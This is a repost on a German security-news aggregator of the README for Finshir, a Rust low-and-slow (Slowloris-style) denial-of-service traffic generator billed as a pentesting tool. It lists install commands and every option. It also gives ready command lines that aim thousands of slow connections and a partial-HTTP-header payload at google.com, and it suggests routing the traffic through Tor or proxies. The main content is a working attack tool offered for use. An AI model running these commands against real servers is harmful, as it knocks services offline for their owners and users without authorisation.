1. IT-Security >
  2. Cyber Security Nachrichten >
  3. Finshir - A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust


➤ Finshir - A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust

RSS Kategorie Pfeil IT Security Nachrichten vom | Quelle: feedproxy.google.com Direktlink öffnen Nachrichten Bewertung

You are seeing a high-performant, coroutines-driven, and fully customisable implementation of Low & Slow load generator designed for real-world pentesting. You can easily torify/proxify it using various platform-dependent utilities.


  • Coroutines-driven. Finshir uses coroutines (also called lightweight threads) instead of ordinary threads, which lets you open many more connections with fewer system resources.
  • Generic. Unlike other Low & Slow utilities, Finshir lets you transmit arbitrary data sets over the TCP protocol. It may be partial HTTP headers, empty spaces, and so on.
  • Written in Rust. How you can see, all the logic is written completely in Rust, which means that it leverages bare-metal performance and high-level safety (no SIGSEGV, SIGILL, and other "funny" stuff).

  • Platform-dependent. Like most of pentesting utilities, this project is developed for only UNIX-based systems. If you are a Windows user, you probably need a virtual machine or another computer with UNIX.


Building from crates.io
$ cargo install finshir

Building from sources
$ git clone https://github.com/Gymmasssorla/finshir.git
$ cd finshir
$ cargo build --release

Pre-compiled binaries
$ wget https://github.com/Gymmasssorla/finshir/releases/download/vX.X.X/finshir-x86_64-linux
$ chmod a+x finshir-x86_64-linux


Name Explanation
-h, --help Prints help information
--use-tls Use a TLS connection instead of the ordinary TCP protocol. It might be used to test HTTPS-based services.
-V, --version Prints version information

Name Value Default Explanation
--connect-periodicity Time span 7secs This option will be applied if a socket connection error occurs (the next connection will be performed after this periodicity)
--connect-timeout Time span 10secs Try connect a socket within a specified timeout. If a timeout is reached and a socket wasn't connected, the program will retry the operation later
--connections Positive integer 1000 A number of connections the program will handle simultaneously. This option also equals to a number of coroutines
--date-time-format String %X A format for displaying local date and time in log messages. Type man strftime to see the format specification
--failed-count Positive integer 5 A number of failed data transmissions used to reconnect a socket to a remote web server
--ip-ttl Unsigned integer None Specifies the IP_TTL value for all future sockets. Usually this value equals a number of routers that a packet can go through
--json-report Filename None A file to which a JSON report (also called a "total summary") will be generated before exiting
-f, --portions-file Filename None A file which consists of a custom JSON array of data portions, specified as strings.

When a coroutine finished sending all portions, it reconnects its socket and starts sending them again.
-r, --receiver Socket address None A receiver of generator traffic, specified as an IP address (or a domain name) and a port number, separated by a colon
-d, --test-duration Time span 64years 64hours 64secs A whole test duration, after which all spawned coroutines will stop their work
--text-report Filename None A file to which the program will generate a human-readable report (also called a "total summary") before exiting
-v, --verbosity From 0 to 5 3 Enable one of the possible verbosity levels. The zero level doesn't print anything, and the last level prints everything.

Note that specifying the 4 and 5 verbosity levels might decrease performance, do it only for debugging.
-w, --wait Time span 5secs A waiting time span before test execution used to prevent a launch of an erroneous (unwanted) test
--write-periodicity Time span 30secs A time interval between writing data portions. This option can be used to modify test intensity
--write-timeout Time span 10secs If a timeout is reached and a data portion wasn't sent, the program will retry the operation later
--xml-report Filename None A file to which an XML report (also called a "total summary") will be generated before exiting


Minimal command
The following command spawns 1000 coroutines, each trying to establish a new TCP connection. When connections are established, it sends empty spaces every 30 seconds, thereby order a server to wait as long as it can:
# Specify one of the Google's IP addresses as a target web server
$ finshir --receiver=google.com:80

Test intensity
Low & Slow techniques assume to be VERY SLOW, which means that you typically send a couple of bytes every N seconds. For instance, Finshir uses the 30 seconds interval by default, but it's modifiable as well:
# Test the Google's server sending data portions every one minute
$ finshir --receiver=google.com:80 --write-periodicity=1min

Connections count
The default number of parallel connections is 1000. However, you can modify this limit using the --connections option, but be sure that you system is able to handle such amount of file descriptors:
# Modify the default limit of file descriptors to 17015
$ sudo ulimit -n 17015

# Test the target server using 17000 parallel TCP connections
$ finshir --receiver=google.com:80 --connections=17000

Logging options
Consider specifying a custom verbosity level from 0 to 5 (inclusively), which is done by the --verbosity option. There is also the --date-time-format option which tells Finshir to use your custom date-time format.
# Use a custom date-time format and the last verbosity level
$ finshir --receiver=google.com:80 --date-time-format="%F" --verbosity=5
Different verbosity levels print different logging types. As you can see in the table below, the zero verbosity level prints nothing, and the last one prints everything. The levels in the middle print logs selectively:
Errors Warnings Notifications Debugs Traces
Zero (0)
First (1)
Second (2)
Third (3)
Fourth (4)
Fifth (5)

TLS support
Most of web servers today use the HTTPS protocol instead of HTTP, which is based on TLS. Since v0.2.0, Finshir has functionality to connect through TLS using the --use-tls flag.
# Connect to the Google's server through TLS on 443 port (HTTPS)
$ finshir --receiver=google.com:443 --use-tls

Custom data portions
By default, Finshir generates 100 empty spaces as data portions to send. You can override this behaviour by specifying your custom messages as a file, consisting of a single JSON array. This example is focused on Google:
# Send partial HTTP headers to Google using `--portions-file`
$ finshir --receiver=google.com:443 -f files/google.json --use-tls
The command above sends a partial HTTPS request (first introduced by Slowloris) through TLS (which is achieved by specifying the --use-tls flag). You can access this partial request inside files/google.json.
"GET https://www.google.com/ HTTP/1.1\r\n",
"Host: www.google.com\r\n",
"User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept-Encoding: gzip, deflate, br\r\n",
"Connection: keep-alive\r\n",
"Upgrade-Insecure-Requests: 1\r\n",
"Cache-Control: max-age=0\r\n",
"TE: Trailers\r\n",

Generate a report
Report is a set of statistics variables like a total number of connections established, a total number of failed transmissions and so on. There is three options for this: --xml-report, --json-report, and --text-report:
# Test the Google's server and generate a JSON report at the end
$ finshir --receiver=google.com:80 --json-report=report.json
What means "at the end"? Well, Finshir will generate a report for you either if allotted time expires or if you cancel the process by Ctrl-C. You can look at the report examples in the files/reports folder:
"connections": {
"failed": "0",
"successful": "305",
"total": "305"
"receiver": "google.com:80",
"time": {
"test-duration": "4s 71ms 819us 653ns",
"test-start": "Wed, 29 May 2019 22:04:34 -0000"
"total-bytes-sent": "305",
"total-errors": "0",
"transmissions": {
"failed": "0",
"successful": "305",
"total": "305"
<?xml version="1.0" encoding="UTF-8"?>
<test-start>Wed, 29 May 2019 22:04:16 -0000</test-start>
<test-duration>2s 289ms 664us 988ns</test-duration>
*********************** FINSHIR REPORT ***********************
Receiver: google.com:80
Total bytes sent: 535
Total errors: 0

Test start: Wed, 29 May 2019 22:04:55 -0000
Test duration: 7s 385ms 765us 179ns

Successful connections: 535
Failed connections: 0
Total connections: 535

Successful transmissions: 535
Failed transmissions: 0
Total transmissions: 535
If none of the options above has been specified, Finshir prints a report right to your terminal. That is, you can just run a test, cancel it later, and see the results which you can easily save. Perfect!

You are always welcome for any contribution to this project! But before you start, you should read the appropriate document to know about the preferred development process and the basic communication rules.

Legal disclaimer
Finshir was developed as a means of testing stress resistance of web servers, and not for hacking, that is, the author of the project IS NOT RESPONSIBLE for any damage caused by your use of his program.

Project references

Temirkhan Myrzamadi <[email protected]> (the author)


➥ Externe Webseite mit kompletten Inhalt öffnen

Kommentiere zu Finshir - A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust

➤ Ähnliche Beiträge

  • 1.

    Finshir - A Coroutines-Driven Low And Slow Traffic Sender, Written In Rust

    vom 1887.73 Punkte ic_school_black_18dp
    You are seeing a high-performant, coroutines-driven, and fully customisable implementation of Low & Slow load generator designed for real-world pentesting. You can easily torify/proxify it using various platform-dependent utilities. Demonstration Advantages Coroutines-driven. Finshir uses coroutines (also called lightweight threads) instead of ordinary threads, which lets you open many more conne
  • 2.

    Malcolm - A Powerful, Easily Deployable Network Traffic Analysis Tool Suite For Full Packet Capture Artifacts (PCAP Files) And Zeek Logs

    vom 284.86 Punkte ic_school_black_18dp
    Malcolm is a powerful network traffic analysis tool suite designed with the following goals in mind: Easy to use – Malcolm accepts network traffic data in the form of full packet capture (PCAP) files and Zeek (formerly Bro) logs. These artifacts can be
  • 3.

    Rust 1.31 Released As 'Rust 2018' In Major Push For Backwards Compatibility

    vom 247.95 Punkte ic_school_black_18dp
    "The Rust programming language team has announced the first major edition of Rust since 1.0 was released in 2015," reports SD Times -- specifically, Rust 1.31, the first edition of "Rust 2018," described by Rust's developers as "the culmination of feature
  • 4.

    TA18-106A: Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices

    vom 198.82 Punkte ic_school_black_18dp
    Original release date: April 16, 2018Systems Affected Generic Routing Encapsulation (GRE) Enabled DevicesCisco Smart Install (SMI) Enabled DevicesSimple Network Management Protocol (SNMP) Enabled Network DevicesOverview This joint Technical Alert (TA) is the result of analy
  • 5.

    All About Rust in Real Life: Linkerd 2.0 | The Open Source Show

    vom 178.34 Punkte ic_school_black_18dp
    Oliver Gould (@olix0r), CTO at Buoyant and one of the creators of Linkerd, joins Lachie Evenson (@LachlanEvenson) to talk Rust: one of StackOverflow's most loved programming languages for the 4th year running. Specifically, how and why Linkerd rewr
  • 6.

    Visual Studio Code Remote Development may change everything

    vom 143.23 Punkte ic_school_black_18dp
    OK, that's a little clickbaity but it's surely impressed the heck out of me. You can read more about VS Code Remote Development (at the time of this writing, available in the VS Code Insiders builds) but here's a little on my first experience with
  • 7.

    How Rust Can Replace C In Python Libraries

    vom 142.72 Punkte ic_school_black_18dp
    An anonymous reader quotes InfoWorld: Proponents of Rust, the language engineered by Mozilla to give developers both speed and memory safety, are stumping for the language as a long-term replacement for C and C++. But replacing software written in these
  • 8.

    All About Rust | The Open Source Show

    vom 139.21 Punkte ic_school_black_18dp
    Oliver Gould (@olix0r), CTO at Buoyant and one of the creators of Linkerd, joins Lachie Evenson (@LachlanEvenson) to talk about Rust – which was ranked the "the most loved programming language" in StackOverflow's 2019 Developer survey. Oliver sh
  • 9.

    Protecting against unintentional regressions to cleartext traffic in your Android apps

    vom 130.23 Punkte ic_school_black_18dp
    Posted by Alex Klyubin, Android Security team When your app communicates with servers using cleartext network traffic, such as HTTP, the traffic risks being eavesdropped upon and tampered with by third parties. This may leak information about your users
  • 10.

    Intel Engineer Launches Working Group To Bring Rust 'Full Parity With C'

    vom 129.13 Punkte ic_school_black_18dp
    Someone from the Rust language governance team gave an interesting talk at this year's Open Source Technology Summit. Josh Triplett (who is also a principal engineer at Intel), discussed "what Intel is contributing to bring Rust to full parity with C,"
  • 11.

    Applepie - A Hypervisor For Fuzzing Built With WHVP And Bochs

    vom 120.58 Punkte ic_school_black_18dp
    Hello! Welcome to applepie! This is a tool designed for fuzzing, introspection, and finding bugs! This is a hypervisor using the Windows Hypervisor Platform API present in recent versions of Windows (specifically this was developed and tested on Windows
  • 12.

    TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors

    vom 118.91 Punkte ic_school_black_18dp
    Original release date: April 27, 2017 | Last revised: May 14, 2017Systems Affected Networked Systems Overview The National Cybersecurity and Communications Integration Center (NCCIC) has become aware of an emerging sophisticated campaign, occurri